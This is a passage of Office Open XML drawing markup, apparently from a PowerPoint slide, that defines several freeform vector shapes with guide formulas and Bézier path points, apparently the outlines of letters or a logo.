                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0782462-72EF-4E2E-9A2C-BD01E2F81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3288" y="1208088"/>
              <a:ext cx="19050" cy="33338"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 12"/>
                <a:gd name="T1" fmla="*/ 0 h 21"/>
                <a:gd name="T2" fmla="*/ 3 w 12"/>
                <a:gd name="T3" fmla="*/ 0 h 21"/>
                <a:gd name="T4" fmla="*/ 3 w 12"/>
                <a:gd name="T5" fmla="*/ 15 h 21"/>
                <a:gd name="T6" fmla="*/ 3 w 12"/>
                <a:gd name="T7" fmla="*/ 15 h 21"/>
                <a:gd name="T8" fmla="*/ 9 w 12"/>
                <a:gd name="T9" fmla="*/ 7 h 21"/>
                <a:gd name="T10" fmla="*/ 12 w 12"/>
                <a:gd name="T11" fmla="*/ 7 h 21"/>
                <a:gd name="T12" fmla="*/ 7 w 12"/>
                <a:gd name="T13" fmla="*/ 13 h 21"/>
                <a:gd name="T14" fmla="*/ 12 w 12"/>
                <a:gd name="T15" fmla="*/ 21 h 21"/>
                <a:gd name="T16" fmla="*/ 9 w 12"/>
                <a:gd name="T17" fmla="*/ 21 h 21"/>
                <a:gd name="T18" fmla="*/ 5 w 12"/>
                <a:gd name="T19" fmla="*/ 15 h 21"/>
                <a:gd name="T20" fmla="*/ 3 w 12"/>
                <a:gd name="T21" fmla="*/ 18 h 21"/>
                <a:gd name="T22" fmla="*/ 3 w 12"/>
                <a:gd name="T23" fmla="*/ 21 h 21"/>
                <a:gd name="T24" fmla="*/ 0 w 12"/>
                <a:gd name="T25" fmla="*/ 21 h 21"/>
                <a:gd name="T26" fmla="*/ 0 w 12"/>
                <a:gd name="T2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21">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3" y="0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9" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="18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7" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DD12207-14A7-4842-A68A-C30CDA0AF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8688" y="1219200"/>
              <a:ext cx="17462" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 18"/>
                <a:gd name="T1" fmla="*/ 12 h 25"/>
                <a:gd name="T2" fmla="*/ 11 w 18"/>
                <a:gd name="T3" fmla="*/ 0 h 25"/>
                <a:gd name="T4" fmla="*/ 18 w 18"/>
                <a:gd name="T5" fmla="*/ 3 h 25"/>
                <a:gd name="T6" fmla="*/ 16 w 18"/>
                <a:gd name="T7" fmla="*/ 5 h 25"/>
                <a:gd name="T8" fmla="*/ 11 w 18"/>
                <a:gd name="T9" fmla="*/ 3 h 25"/>
                <a:gd name="T10" fmla="*/ 4 w 18"/>
                <a:gd name="T11" fmla="*/ 12 h 25"/>
                <a:gd name="T12" fmla="*/ 11 w 18"/>
                <a:gd name="T13" fmla="*/ 21 h 25"/>
                <a:gd name="T14" fmla="*/ 17 w 18"/>
                <a:gd name="T15" fmla="*/ 19 h 25"/>
                <a:gd name="T16" fmla="*/ 18 w 18"/>
                <a:gd name="T17" fmla="*/ 22 h 25"/>
                <a:gd name="T18" fmla="*/ 11 w 18"/>
                <a:gd name="T19" fmla="*/ 25 h 25"/>
                <a:gd name="T20" fmla="*/ 0 w 18"/>
                <a:gd name="T21" fmla="*/ 1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25">
                  <a:moveTo>
                    <a:pt x="0" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4"/>
                    <a:pt x="5" y="0"/>
                    <a:pt x="11" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="16" y="1"/>
                    <a:pt x="18" y="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7" y="3"/>
                    <a:pt x="4" y="7"/>
                    <a:pt x="4" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="18"/>
                    <a:pt x="7" y="21"/>
                    <a:pt x="11" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="21"/>
                    <a:pt x="15" y="20"/>
                    <a:pt x="17" y="19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6" y="23"/>
                    <a:pt x="14" y="25"/>
                    <a:pt x="11" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="25"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="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8" name="Freeform 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F08EAF4-11B9-45D0-A19A-18508972F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5675" y="1208088"/>
              <a:ext cx="17462" cy="33338"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 19"/>
                <a:gd name="T1" fmla="*/ 0 h 35"/>
                <a:gd name="T2" fmla="*/ 4 w 19"/>
                <a:gd name="T3" fmla="*/ 0 h 35"/>
                <a:gd name="T4" fmla="*/ 4 w 19"/>
                <a:gd name="T5" fmla="*/ 10 h 35"/>
                <a:gd name="T6" fmla="*/ 4 w 19"/>
                <a:gd name="T7" fmla="*/ 15 h 35"/>
                <a:gd name="T8" fmla="*/ 12 w 19"/>
                <a:gd name="T9" fmla="*/ 11 h 35"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 20 h 35"/>
                <a:gd name="T12" fmla="*/ 19 w 19"/>
                <a:gd name="T13" fmla="*/ 35 h 35"/>
                <a:gd name="T14" fmla="*/ 15 w 19"/>
                <a:gd name="T15" fmla="*/ 35 h 35"/>
                <a:gd name="T16" fmla="*/ 15 w 19"/>
                <a:gd name="T17" fmla="*/ 21 h 35"/>
                <a:gd name="T18" fmla="*/ 11 w 19"/>
                <a:gd name="T19" fmla="*/ 14 h 35"/>
                <a:gd name="T20" fmla="*/ 4 w 19"/>
                <a:gd name="T21" fmla="*/ 18 h 35"/>
                <a:gd name="T22" fmla="*/ 4 w 19"/>
                <a:gd name="T23" fmla="*/ 35 h 35"/>
                <a:gd name="T24" fmla="*/ 0 w 19"/>
                <a:gd name="T25" fmla="*/ 35 h 35"/>
                <a:gd name="T26" fmla="*/ 0 w 19"/>
                <a:gd name="T27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35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6" y="13"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="12" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="11"/>
                    <a:pt x="19" y="14"/>
                    <a:pt x="19" y="20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6"/>
                    <a:pt x="14" y="14"/>
                    <a:pt x="11" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="14"/>
                    <a:pt x="7" y="15"/>
                    <a:pt x="4" y="18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0" y="35"/>
                    <a:pt x="0" y="35"/>
                    <a:pt x="0" y="3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9" name="Freeform 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2877C8EE-DC38-48A7-95CF-333C5813F7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04250" y="1219200"/>
              <a:ext cx="17462" cy="23813"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 19"/>
                <a:gd name="T1" fmla="*/ 18 h 25"/>
                <a:gd name="T2" fmla="*/ 15 w 19"/>
                <a:gd name="T3" fmla="*/ 9 h 25"/>
                <a:gd name="T4" fmla="*/ 10 w 19"/>
                <a:gd name="T5" fmla="*/ 3 h 25"/>
                <a:gd name="T6" fmla="*/ 3 w 19"/>
                <a:gd name="T7" fmla="*/ 6 h 25"/>
                <a:gd name="T8" fmla="*/ 1 w 19"/>
                <a:gd name="T9" fmla="*/ 3 h 25"/>
                <a:gd name="T10" fmla="*/ 10 w 19"/>
                <a:gd name="T11" fmla="*/ 0 h 25"/>
                <a:gd name="T12" fmla="*/ 19 w 19"/>
                <a:gd name="T13" fmla="*/ 9 h 25"/>
                <a:gd name="T14" fmla="*/ 19 w 19"/>
                <a:gd name="T15" fmla="*/ 24 h 25"/>
                <a:gd name="T16" fmla="*/ 15 w 19"/>
                <a:gd name="T17" fmla="*/ 24 h 25"/>
                <a:gd name="T18" fmla="*/ 15 w 19"/>
                <a:gd name="T19" fmla="*/ 21 h 25"/>
                <a:gd name="T20" fmla="*/ 15 w 19"/>
                <a:gd name="T21" fmla="*/ 21 h 25"/>
                <a:gd name="T22" fmla="*/ 7 w 19"/>
                <a:gd name="T23" fmla="*/ 25 h 25"/>
                <a:gd name="T24" fmla="*/ 0 w 19"/>
                <a:gd name="T25" fmla="*/ 18 h 25"/>
                <a:gd name="T26" fmla="*/ 15 w 19"/>
                <a:gd name="T27" fmla="*/ 18 h 25"/>
                <a:gd name="T28" fmla="*/ 15 w 19"/>
                <a:gd name="T29" fmla="*/ 12 h 25"/>
                <a:gd name="T30" fmla="*/ 4 w 19"/>
                <a:gd name="T31" fmla="*/ 18 h 25"/>
                <a:gd name="T32" fmla="*/ 8 w 19"/>
                <a:gd name="T33" fmla="*/ 21 h 25"/>
                <a:gd name="T34" fmla="*/ 15 w 19"/>
                <a:gd name="T35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25">
                  <a:moveTo>
                    <a:pt x="0" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13"/>
                    <a:pt x="5" y="10"/>
                    <a:pt x="15" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="6"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="10" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="3"/>
                    <a:pt x="5" y="4"/>
                    <a:pt x="3" y="6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1"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="10" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="19" y="4"/>
                    <a:pt x="19" y="9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3" y="23"/>
                    <a:pt x="10" y="25"/>
                    <a:pt x="7" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="25"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="18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7" y="13"/>
                    <a:pt x="4" y="15"/>
                    <a:pt x="4" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="20"/>
                    <a:pt x="6" y="21"/>
                    <a:pt x="8" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="21"/>
                    <a:pt x="12" y="20"/>
                    <a:pt x="15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0" name="Freeform 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0DF097-5A6D-4317-AC0C-279214DF83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32825" y="1209675"/>
              <a:ext cx="4762" cy="31750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 6"/>
                <a:gd name="T1" fmla="*/ 3 h 34"/>
                <a:gd name="T2" fmla="*/ 3 w 6"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 6 w 6"/>
                <a:gd name="T5" fmla="*/ 3 h 34"/>
                <a:gd name="T6" fmla="*/ 3 w 6"/>
                <a:gd name="T7" fmla="*/ 5 h 34"/>
                <a:gd name="T8" fmla="*/ 0 w 6"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 1 w 6"/>
                <a:gd name="T11" fmla="*/ 10 h 34"/>
                <a:gd name="T12" fmla="*/ 5 w 6"/>
                <a:gd name="T13" fmla="*/ 10 h 34"/>
                <a:gd name="T14" fmla="*/ 5 w 6"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 1 w 6"/>
                <a:gd name="T17" fmla="*/ 34 h 34"/>
                <a:gd name="T18" fmla="*/ 1 w 6"/>
                <a:gd name="T19" fmla="*/ 1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4">
                  <a:moveTo>
                    <a:pt x="0" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1"/>
                    <a:pt x="1" y="0"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="0"/>
                    <a:pt x="6" y="1"/>
                    <a:pt x="6" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="4"/>
                    <a:pt x="4" y="5"/>
                    <a:pt x="3" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5"/>
                    <a:pt x="0" y="4"/>
                    <a:pt x="0" y="3"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1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" y="34"/>
                    <a:pt x="1" y="34"/>
                    <a:pt x="1" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1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1" name="Freeform 70">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533AC796-E819-43CC-93CC-AFE8930D0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8700" y="1219200"/>
              <a:ext cx="17462" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 19"/>
                <a:gd name="T1" fmla="*/ 0 h 24"/>
                <a:gd name="T2" fmla="*/ 4 w 19"/>
                <a:gd name="T3" fmla="*/ 0 h 24"/>
                <a:gd name="T4" fmla="*/ 4 w 19"/>
                <a:gd name="T5" fmla="*/ 4 h 24"/>
                <a:gd name="T6" fmla="*/ 4 w 19"/>
                <a:gd name="T7" fmla="*/ 4 h 24"/>
                <a:gd name="T8" fmla="*/ 12 w 19"/>
                <a:gd name="T9" fmla="*/ 0 h 24"/>
                <a:gd name="T10" fmla="*/ 19 w 19"/>
                <a:gd name="T11" fmla="*/ 9 h 24"/>
                <a:gd name="T12" fmla="*/ 19 w 19"/>
                <a:gd name="T13" fmla="*/ 24 h 24"/>
                <a:gd name="T14" fmla="*/ 15 w 19"/>
                <a:gd name="T15" fmla="*/ 24 h 24"/>
                <a:gd name="T16" fmla="*/ 15 w 19"/>
                <a:gd name="T17" fmla="*/ 10 h 24"/>
                <a:gd name="T18" fmla="*/ 11 w 19"/>
                <a:gd name="T19" fmla="*/ 3 h 24"/>
                <a:gd name="T20" fmla="*/ 4 w 19"/>
                <a:gd name="T21" fmla="*/ 7 h 24"/>
                <a:gd name="T22" fmla="*/ 4 w 19"/>
                <a:gd name="T23" fmla="*/ 24 h 24"/>
                <a:gd name="T24" fmla="*/ 0 w 19"/>
                <a:gd name="T25" fmla="*/ 24 h 24"/>
                <a:gd name="T26" fmla="*/ 0 w 19"/>
                <a:gd name="T27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24">
                  <a:moveTo>
                    <a:pt x="0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2"/>
                    <a:pt x="9" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="19" y="9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5"/>
                    <a:pt x="14" y="3"/>
                    <a:pt x="11" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="3"/>
                    <a:pt x="7" y="4"/>
                    <a:pt x="4" y="7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2" name="Freeform 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207F858C-F186-4374-85D4-2F421E2A1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6900" y="1093788"/>
              <a:ext cx="55562" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 58"/>
                <a:gd name="T1" fmla="*/ 72 h 90"/>
                <a:gd name="T2" fmla="*/ 24 w 58"/>
                <a:gd name="T3" fmla="*/ 90 h 90"/>
                <a:gd name="T4" fmla="*/ 41 w 58"/>
                <a:gd name="T5" fmla="*/ 90 h 90"/>
                <a:gd name="T6" fmla="*/ 45 w 58"/>
                <a:gd name="T7" fmla="*/ 75 h 90"/>
                <a:gd name="T8" fmla="*/ 38 w 58"/>
                <a:gd name="T9" fmla="*/ 75 h 90"/>
                <a:gd name="T10" fmla="*/ 33 w 58"/>
                <a:gd name="T11" fmla="*/ 69 h 90"/>
                <a:gd name="T12" fmla="*/ 42 w 58"/>
                <a:gd name="T13" fmla="*/ 36 h 90"/>
                <a:gd name="T14" fmla="*/ 54 w 58"/>
                <a:gd name="T15" fmla="*/ 36 h 90"/>
                <a:gd name="T16" fmla="*/ 58 w 58"/>
                <a:gd name="T17" fmla="*/ 20 h 90"/>
                <a:gd name="T18" fmla="*/ 46 w 58"/>
                <a:gd name="T19" fmla="*/ 20 h 90"/>
                <a:gd name="T20" fmla="*/ 51 w 58"/>
                <a:gd name="T21" fmla="*/ 0 h 90"/>
                <a:gd name="T22" fmla="*/ 23 w 58"/>
                <a:gd name="T23" fmla="*/ 0 h 90"/>
                <a:gd name="T24" fmla="*/ 18 w 58"/>
                <a:gd name="T25" fmla="*/ 20 h 90"/>
                <a:gd name="T26" fmla="*/ 5 w 58"/>
                <a:gd name="T27" fmla="*/ 20 h 90"/>
                <a:gd name="T28" fmla="*/ 1 w 58"/>
                <a:gd name="T29" fmla="*/ 36 h 90"/>
                <a:gd name="T30" fmla="*/ 14 w 58"/>
                <a:gd name="T31" fmla="*/ 36 h 90"/>
                <a:gd name="T32" fmla="*/ 4 w 58"/>
                <a:gd name="T33" fmla="*/ 7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90">
                  <a:moveTo>
                    <a:pt x="4" y="72"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="88"/>
                    <a:pt x="6" y="90"/>
                    <a:pt x="24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2" y="73"/>
                    <a:pt x="33" y="69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4" y="36"/>
                    <a:pt x="14" y="36"/>
                    <a:pt x="14" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4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3" name="Freeform 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E787C9D-4A27-4C05-950D-F9EF8DCB8AC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2938" y="1112838"/>
              <a:ext cx="82550" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 71 w 88"/>
                <a:gd name="T1" fmla="*/ 70 h 70"/>
                <a:gd name="T2" fmla="*/ 84 w 88"/>
                <a:gd name="T3" fmla="*/ 19 h 70"/>
                <a:gd name="T4" fmla="*/ 66 w 88"/>
                <a:gd name="T5" fmla="*/ 0 h 70"/>
                <a:gd name="T6" fmla="*/ 17 w 88"/>
                <a:gd name="T7" fmla="*/ 0 h 70"/>
                <a:gd name="T8" fmla="*/ 13 w 88"/>
                <a:gd name="T9" fmla="*/ 16 h 70"/>
                <a:gd name="T10" fmla="*/ 51 w 88"/>
                <a:gd name="T11" fmla="*/ 16 h 70"/>
                <a:gd name="T12" fmla="*/ 55 w 88"/>
                <a:gd name="T13" fmla="*/ 24 h 70"/>
                <a:gd name="T14" fmla="*/ 47 w 88"/>
                <a:gd name="T15" fmla="*/ 55 h 70"/>
                <a:gd name="T16" fmla="*/ 38 w 88"/>
                <a:gd name="T17" fmla="*/ 55 h 70"/>
                <a:gd name="T18" fmla="*/ 33 w 88"/>
                <a:gd name="T19" fmla="*/ 47 h 70"/>
                <a:gd name="T20" fmla="*/ 39 w 88"/>
                <a:gd name="T21" fmla="*/ 22 h 70"/>
                <a:gd name="T22" fmla="*/ 8 w 88"/>
                <a:gd name="T23" fmla="*/ 35 h 70"/>
                <a:gd name="T24" fmla="*/ 4 w 88"/>
                <a:gd name="T25" fmla="*/ 52 h 70"/>
                <a:gd name="T26" fmla="*/ 22 w 88"/>
                <a:gd name="T27" fmla="*/ 70 h 70"/>
                <a:gd name="T28" fmla="*/ 71 w 88"/>
                <a:gd name="T2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70">
                  <a:moveTo>
                    <a:pt x="71" y="70"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="19"/>
                    <a:pt x="84" y="19"/>
                    <a:pt x="84" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="4"/>
                    <a:pt x="75" y="0"/>
                    <a:pt x="6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6" y="16"/>
                    <a:pt x="57" y="18"/>
                    <a:pt x="55" y="24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3" y="55"/>
                    <a:pt x="32" y="52"/>
                    <a:pt x="33" y="4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0" y="67"/>
                    <a:pt x="9" y="70"/>
                    <a:pt x="22" y="70"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="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4" name="Freeform 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38344AF5-A090-4BD4-AD4F-5CCAADA81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1175" y="1112838"/>
              <a:ext cx="85725" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 68 w 90"/>
                <a:gd name="T1" fmla="*/ 0 h 70"/>
                <a:gd name="T2" fmla="*/ 19 w 90"/>
                <a:gd name="T3" fmla="*/ 0 h 70"/>
                <a:gd name="T4" fmla="*/ 15 w 90"/>
                <a:gd name="T5" fmla="*/ 16 h 70"/>
                <a:gd name="T6" fmla="*/ 41 w 90"/>
                <a:gd name="T7" fmla="*/ 16 h 70"/>
                <a:gd name="T8" fmla="*/ 12 w 90"/>
                <a:gd name="T9" fmla="*/ 27 h 70"/>
                <a:gd name="T10" fmla="*/ 0 w 90"/>
                <a:gd name="T11" fmla="*/ 70 h 70"/>
                <a:gd name="T12" fmla="*/ 28 w 90"/>
                <a:gd name="T13" fmla="*/ 70 h 70"/>
                <a:gd name="T14" fmla="*/ 43 w 90"/>
                <a:gd name="T15" fmla="*/ 16 h 70"/>
                <a:gd name="T16" fmla="*/ 52 w 90"/>
                <a:gd name="T17" fmla="*/ 16 h 70"/>
                <a:gd name="T18" fmla="*/ 57 w 90"/>
                <a:gd name="T19" fmla="*/ 24 h 70"/>
                <a:gd name="T20" fmla="*/ 45 w 90"/>
                <a:gd name="T21" fmla="*/ 70 h 70"/>
                <a:gd name="T22" fmla="*/ 73 w 90"/>
                <a:gd name="T23" fmla="*/ 70 h 70"/>
                <a:gd name="T24" fmla="*/ 86 w 90"/>
                <a:gd name="T25" fmla="*/ 19 h 70"/>
                <a:gd name="T26" fmla="*/ 68 w 90"/>
                <a:gd name="T2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0">
                  <a:moveTo>
                    <a:pt x="68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7" y="16"/>
                    <a:pt x="58" y="18"/>
                    <a:pt x="57" y="24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86" y="19"/>
                    <a:pt x="86" y="19"/>
                    <a:pt x="86" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="4"/>
                    <a:pt x="81" y="0"/>
                    <a:pt x="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5" name="Freeform 74">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1EB3DD8-C484-479B-B0C5-185EC8B1DB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4975" y="1112838"/>
              <a:ext cx="84137" cy="66675"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 13 w 88"/>
                <a:gd name="T1" fmla="*/ 16 h 70"/>
                <a:gd name="T2" fmla="*/ 39 w 88"/>
                <a:gd name="T3" fmla="*/ 16 h 70"/>
                <a:gd name="T4" fmla="*/ 10 w 88"/>
                <a:gd name="T5" fmla="*/ 27 h 70"/>
                <a:gd name="T6" fmla="*/ 4 w 88"/>
                <a:gd name="T7" fmla="*/ 51 h 70"/>
                <a:gd name="T8" fmla="*/ 22 w 88"/>
                <a:gd name="T9" fmla="*/ 70 h 70"/>
                <a:gd name="T10" fmla="*/ 72 w 88"/>
                <a:gd name="T11" fmla="*/ 70 h 70"/>
                <a:gd name="T12" fmla="*/ 76 w 88"/>
                <a:gd name="T13" fmla="*/ 55 h 70"/>
                <a:gd name="T14" fmla="*/ 38 w 88"/>
                <a:gd name="T15" fmla="*/ 55 h 70"/>
                <a:gd name="T16" fmla="*/ 33 w 88"/>
                <a:gd name="T17" fmla="*/ 46 h 70"/>
                <a:gd name="T18" fmla="*/ 34 w 88"/>
                <a:gd name="T19" fmla="*/ 43 h 70"/>
                <a:gd name="T20" fmla="*/ 78 w 88"/>
                <a:gd name="T21" fmla="*/ 43 h 70"/>
                <a:gd name="T22" fmla="*/ 85 w 88"/>
                <a:gd name="T23" fmla="*/ 19 h 70"/>
                <a:gd name="T24" fmla="*/ 67 w 88"/>
                <a:gd name="T25" fmla="*/ 0 h 70"/>
                <a:gd name="T26" fmla="*/ 30 w 88"/>
                <a:gd name="T27" fmla="*/ 0 h 70"/>
                <a:gd name="T28" fmla="*/ 13 w 88"/>
                <a:gd name="T29" fmla="*/ 16 h 70"/>
                <a:gd name="T30" fmla="*/ 50 w 88"/>
                <a:gd name="T31" fmla="*/ 16 h 70"/>
                <a:gd name="T32" fmla="*/ 55 w 88"/>
                <a:gd name="T33" fmla="*/ 24 h 70"/>
                <a:gd name="T34" fmla="*/ 54 w 88"/>
                <a:gd name="T35" fmla="*/ 27 h 70"/>
                <a:gd name="T36" fmla="*/ 38 w 88"/>
                <a:gd name="T37" fmla="*/ 27 h 70"/>
                <a:gd name="T38" fmla="*/ 41 w 88"/>
                <a:gd name="T39" fmla="*/ 16 h 70"/>
                <a:gd name="T40" fmla="*/ 50 w 88"/>
                <a:gd name="T41" fmla="*/ 1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8" h="70">
                  <a:moveTo>
                    <a:pt x="13" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="16"/>
                    <a:pt x="39" y="16"/>
                    <a:pt x="39" y="1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0" y="66"/>
                    <a:pt x="9" y="70"/>
                    <a:pt x="22" y="70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3" y="55"/>
                    <a:pt x="32" y="52"/>
                    <a:pt x="33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78" y="43"/>
                    <a:pt x="78" y="43"/>
                    <a:pt x="78" y="4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8" y="4"/>
                    <a:pt x="80" y="0"/>
                    <a:pt x="67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4" y="0"/>
                    <a:pt x="16" y="3"/>
                    <a:pt x="13" y="16"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="50" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="16"/>
                    <a:pt x="57" y="18"/>
                    <a:pt x="55" y="24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41" y="16"/>
                    <a:pt x="41" y="16"/>
                    <a:pt x="41" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5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6" name="Freeform 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5FA60B8-E0C5-4C9F-969C-013955DD64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9251" y="1093788"/>
              <a:ext cx="98425" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 104"/>
                <a:gd name="T1" fmla="*/ 0 h 90"/>
                <a:gd name="T2" fmla="*/ 7 w 104"/>
                <a:gd name="T3" fmla="*/ 15 h 90"/>
                <a:gd name="T4" fmla="*/ 48 w 104"/>
                <a:gd name="T5" fmla="*/ 15 h 90"/>
                <a:gd name="T6" fmla="*/ 17 w 104"/>
                <a:gd name="T7" fmla="*/ 27 h 90"/>
                <a:gd name="T8" fmla="*/ 0 w 104"/>
                <a:gd name="T9" fmla="*/ 90 h 90"/>
                <a:gd name="T10" fmla="*/ 31 w 104"/>
                <a:gd name="T11" fmla="*/ 90 h 90"/>
                <a:gd name="T12" fmla="*/ 39 w 104"/>
                <a:gd name="T13" fmla="*/ 60 h 90"/>
                <a:gd name="T14" fmla="*/ 39 w 104"/>
                <a:gd name="T15" fmla="*/ 60 h 90"/>
                <a:gd name="T16" fmla="*/ 63 w 104"/>
                <a:gd name="T17" fmla="*/ 60 h 90"/>
                <a:gd name="T18" fmla="*/ 94 w 104"/>
                <a:gd name="T19" fmla="*/ 39 h 90"/>
                <a:gd name="T20" fmla="*/ 99 w 104"/>
                <a:gd name="T21" fmla="*/ 21 h 90"/>
                <a:gd name="T22" fmla="*/ 79 w 104"/>
                <a:gd name="T23" fmla="*/ 0 h 90"/>
                <a:gd name="T24" fmla="*/ 11 w 104"/>
